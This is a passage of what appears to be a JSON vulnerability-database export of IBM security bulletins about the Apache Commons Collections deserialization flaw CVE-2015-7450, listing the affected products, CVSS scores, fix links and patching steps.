"2018-06-17T15:13:17", "id": "B45ABED8BD58C33A07263A55AF5D4FCACA1D1D4D41B9076C9B3E26F4C663C536", "href": "https://www.ibm.com/support/pages/node/272089", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Integration Designer.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affects IBM Integration Designer V7.5.1_.x_ to V8.5.6_.x_ releases.\n\n## Remediation/Fixes\n\nTo fully mitigate these vulnerabilities, an additional fix (JR54738) is required for the following product versions: \n\n\n * [IBM Integration Designer V7.5.1.2](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Integration+Designer&release=7.5.1.2&platform=All&function=aparId&apars=JR54738>)\n * [IBM Integration Designer V8.0.1.3](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Integration+Designer&release=8.0.1.3&platform=All&function=aparId&apars=JR54738>)\n * [IBM Integration Designer V8.5.0.1](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Integration+Designer&release=8.5.0.1&platform=All&function=aparId&apars=JR54738>)\n * [IBM Integration Designer V8.5.5.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.5.0-WS-IID-IFJR54738>)\n * [IBM Integration Designer V8.5.6.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.6.0-WS-IID-IFJR54738>)\n\n## Workarounds and Mitigations\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:13", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Integration Designer (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:13", "id": "B0975AA1A2F8C9642F2AAC1300570E8A89FBFFD7FD121D262C86CE50246143F1", "href": "https://www.ibm.com/support/pages/node/272375", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere DataPower XC10 Appliance. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nWebSphere DataPower XC10 Appliance versions 2.1 and 2.5 at all firmware levels.\n\n## Remediation/Fixes\n\nApply an interim fix, according to the table below.** **Interim fixes are associated with the original APAR that is documented in the table. Because these APAR references might be updated to more recent APARs, see the links in the table for the most recent interim fix information. \n \n \n\n\n_Product_| _Version_| _APAR_| _Link to interim fix_ \n---|---|---|--- \nWebSphere DataPower XC10 Appliance V2.1 on appliance 9235-92X| 2.1.0| IT12206| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all>) \nWebSphere DataPower XC10 Appliance V2.1 on appliance 7199-92X| 2.1.0| IT12206| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.1.0.3&platform=All&function=all>) \nWebSphere DataPower XC10 Appliance V2.5 on appliance 7199-92X \n| Version 2.5.0 with SSD drivers ** \nImportant**: See More Information link and follow instructions to determine if you have an old or newer SSD driver on your appliance using the show ssd-version command.| IT12206| [http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all>) \nWebSphere DataPower XC10 Appliance V2.5 virtual image| 2.5.0| IT12206| [http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+DataPower+XC10+Appliance&release=2.5.0.4&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nThere is no workaround. The interim fix must be applied to correct the problem.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects WebSphere DataPower XC10 Appliance (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "4E5D6197DE489CCF6101834752B8C44441B42156C490BD2B4BCF76A0B812636E", "href": "https://www.ibm.com/support/pages/node/272243", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:31", "description": "## Summary\n\nTivoli Common Reporting is shipped as a component of IBM Systems Director Editions. Information about a security vulnerability affecting Tivoli Common Reporting has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletins listed below for the vulnerability details of the affected products.\n\n## Affected Products and Versions\n\n**Affected Product and Version(s)**\n\n| \n\n**Product and Version shipped as a component**\n\n| \n\n**Security Bulletin** \n \n---|---|--- \nIBM Systems Director Editions 6.3.0.0| Tivoli Common Reporting 2.1.1| <http://www-01.ibm.com/support/docview.wss?uid=swg21972799> \nIBM Systems Director Editions 6.3.2.0| Tivoli Common Reporting 3.1| <http://www-01.ibm.com/support/docview.wss?uid=swg21972799> \n \n## Remediation/Fixes\n\nFollow the instructions in the Security Bulletin listed above.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-18T01:30:23", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in\u00a0Tivoli Common Reporting\u00a0shipped with IBM Systems Director Editions.(CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:30:23", "id": "84ADA1A0F9193EF446D20A2AE6CBA8AD78BD934525DE84341357005D9E20113E", "href": "https://www.ibm.com/support/pages/node/682023", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T21:53:30", "description": "## Summary\n\nA security vulnerability has been identified in the current levels of IBM Platform Application Center Standard Edition 9.1.4, 9.1.4.1 and 9.1.4.2 that could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPlatform Application Center Standard Edition Version 9.1.4, 9.1.4.1, 9.1.4.2\n\n## Remediation/Fixes\n\n**Upgrade Application Center with the fix patch 380076 for 9.1.4.2**\n\n1\\. Download IBM Platform Application Center 9.1.4.2 fix patch 380076 from IBM fix central. Link: [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Application+Center&release=9.1.4.2&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Platform%2BComputing&product=ibm/Other+software/Platform+Application+Center&release=9.1.4.2&platform=All&function=all>)\n\n2\\. Upgrade IBM Platform Application Center with this patch according to the upgrade guide: [_http://www-01.ibm.com/support/knowledgecenter/SSGSCT_9.1.4/shared_files/upgrading.dita_](<http://www-01.ibm.com/support/knowledgecenter/SSGSCT_9.1.4/shared_files/upgrading.dita>)\n\n## Workarounds and Mitigations\n\n**Manually apply the Apache jar File for 9.1.4, 9.1.4.1 and 9.1.4.2**\n\n1\\. Download Apache Commons Collections 3.2.2 from [_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>)\n\n2\\. Extract the file `commons-collections-3.2.2.jar` file and copy the extracted files to the management node. \n\n3\\. Back up your existing JAR files and replace them with the Apache Commons Collections 3.2.2 files. The existing JAR files that need to be replaced, include: \n\n`\u00b7 /opt/pac/perf/1.2/lib/commons-collections-3.1.jar `\n\n`\u00b7 /opt/pac/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/commons-collections-3.2.1.jar `\n\n`\u00b7 /opt/pac/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/commons-collections-3.2.2.jar `\n\nIf high availability is enabled, replace the above JAR file on the **all Application Center Server nodes. **\n\n4\\. Restart services. If high availability is enabled, run the following commands on **the active management nodes**.\n\n \n`# perfadmin stop all `\n\n`# pmcadmin stop `\n\n`# perfadmin start all `\n\n`# pmcadmin start `\n\nIf high availability is not enabled, run the following commands on the **all Application Center Server nodes.**\n\n`# perfadmin stop all `\n\n`# pmcadmin stop `\n\n`# perfadmin start all `\n\n`# pmcadmin start`\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:30:26", "type": "ibm", "title": "Security Bulletin: IBM Platform Application Center Standard Edition is affected by a security vulnerability (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:30:26", "id": "D25FC5FB8A8B1C59AB072CD2FAFBE0E65B654246DF1F523B2F0760F380BBA57D", "href": "https://www.ibm.com/support/pages/node/682063", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:56", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Developer for i, Rational Developer for AIX and Linux and Rational Developer for Power Systems Software.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Product Name**\n\n| **Versions Affected** \n---|--- \nRational Developer for Power Systems Software| 8.0, 8.0.0.1, 8.0.0.2, 8.0.0.3, 8.0.3, 8.0.3.1, 8.5, 8.5.1 \nRational Developer for i| 9.0, 9.0.0.1, 9.0.1, 9.1, 9.1.1, 9.1.1.1, 9.5, 9.5.0.1 \nRational Developer for AIX and Linux, AIX COBOL Edition| 9.0, 9.0.0.1, 9.0.1, 9.1, 9.1.1, 9.1.1.2 \nRational Developer for AIX and Linux, C/C++ Edition| 9.0, 9.0.0.1, 9.0.1, 9.1, 9.1.1, 9.1.1.2 \n \n## Remediation/Fixes\n\nUpdate the tools relying on batik in the product to address this vulnerability: \n \n\n\n**Product**| **VRMF**| **Remediation/First Fix** \n---|---|--- \nApply the fix from the corresponding version of Rational Application Developer to your affected product version.| 8.0.x, 8.5.x, 9.0.x, 9.1.x and 9.5.x| \n\n * A fix is available in the [_RDi 9.5.1.1 Fix Pack_](<http://www.ibm.com/support/docview.wss?uid=swg24043183>). \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Developer for i, Rational Developer for AIX and Linux and Rational Developer for Power Systems Software (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-08-03T04:23:43", "id": "5FDFAE3378B94695C361E1304FEE4C2C4F92EC0924C89C3F18E53B852DEDD45C", "href": "https://www.ibm.com/support/pages/node/273023", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:40:05", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about security vulnerabilities affecting WAS have been published in security bulletins.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearCase, ClearCase Remote Client (CCRC) WAN server component.\n\n**Versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x:**\n\n * These vulnerabilities only applies to the CCRC WAN server component, and only for certain levels of WebSphere Application Server.\n\n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS) which is shipped with IBM Rational ClearCase.\n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x | IBM WebSphere Application Server version 9.0. | \n\n[Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>) \n \n**ClearCase Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x | \n\n 1. Determine the WAS version used by your CCRC WAN server. Navigate to the CCRC profile directory (either the profile you specified when installing ClearCase, or `<ccase-home>/common/ccrcprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section. Check your installed version of IBM WebSphere Application Server against this bulletin's list of vulnerable versions.\n 2. Identify the latest available fixes (per the bulletin(s) listed above) for the version of WAS used for CCRC WAN server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n_For 8.0.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-03T21:11:35", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-03T21:11:35", "id": "2AD55644A16B08DC4CD7D5B0074C944128455FA5FB38A6CCCF95596E90E15198", "href": "https://www.ibm.com/support/pages/node/1119363", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T21:54:35", "description": "## Summary\n\nWebsphere Application Server is shipped with Predictive Customer Intelligence. Information about a security vulnerability affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes\n\n## Affected Products and Versions\n\nPredictive Customer Intelligence versions 1.0, 1.0.1, 1.1, 1.1.1, 1.1.2 \n\n \n\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)| Affected Supporting Product and Versions| Affected Supporting Product Security Bulletin \n---|---|--- \nPredictive Customer Intelligence 1.0 and 1.0.1| Websphere Application Server 8.5.5| [IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 (CVE-2015-7450)](<https://www.ibm.com/support/pages/vulnerability-apache-commons-affects-ibm-websphere-application-server-community-edition-v3004-cve-2015-7450> \"IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 \$CVE-2015-7450\$\" ) \nPredictive Customer Intelligence 1.1 and 1.1.1| Websphere Application Server 8.5.5.6| [IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 (CVE-2015-7450)](<https://www.ibm.com/support/pages/vulnerability-apache-commons-affects-ibm-websphere-application-server-community-edition-v3004-cve-2015-7450> \"IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 \$CVE-2015-7450\$\" ) \nPredictive Customer Intelligence 1.1.2| Websphere Application Server 9.0.0.4| [IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 (CVE-2015-7450)](<https://www.ibm.com/support/pages/vulnerability-apache-commons-affects-ibm-websphere-application-server-community-edition-v3004-cve-2015-7450> \"IBM Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server Community Edition v3.0.0.4 \$CVE-2015-7450\$\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-23T20:01:07", "type": "ibm", "title": "Security Bulletin: A Security Vulnerability has been Identified in Websphere Application Server Shipped with Predictive Customer Intelligence (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-06-23T20:01:07", "id": "B61AB1D0CA790E1ACAC9798122DF79FFCF9B8B2580CDC33E702C953B7EF6B140", "href": "https://www.ibm.com/support/pages/node/6237862", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:31", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Application Server on Cloud.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following Versions of IBM Application Server on Cloud may be affected: \n\n * Version 8.5.5 WAS Liberty Core, WAS Base and WAS ND \n * Version 8.0 \n\n## Remediation/Fixes\n\nTo patch an existing instance refer to the IBM WebSphere Application Server bulletin:_ \n_[_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n \nAlternatively, delete the vulnerable instance and create a new instance. The new maintenance will be included.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:19", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Application Server on Cloud (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:19", "id": "B4CC3711A9BC627824CDE5B5B14754E035464BAB4BED480517573FA4510105A9", "href": "https://www.ibm.com/support/pages/node/273627", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:59", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Tivoli Netcool Performance Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [](<http://www-01.ibm.com/support/docview.wss?uid=swg21701503>)[_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nTivoli Netcool Performance Manager 1.4.1| IBM WebSphere Application Server 8.5.0.1 \nTivoli Network Performance Manager 1.4| IBM WebSphere version 8.5.0.1 (Bundled in the Jazz for Service Management version 1.1.0.2) \nTivoli Network Performance Manager 1.3.3| IBM WebSphere version 7.0.0.x (Bundled the TIP version 2.1.0.x) \nTivoli Network Performance Manager 1.3.2| IBM WebSphere version 7.0.0.x (Bundled in the TIP version 2.1.0.x) \nTivoli Network Performance Manager 1.3.1| IBM WebSphere version 7.0.0.x (Bundled in the TIP version 2.1.0.x) \n \n## Remediation/Fixes\n\nRemediation is available at the security bulletin [](<http://www-01.ibm.com/support/docview.wss?uid=swg21701503>)[_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 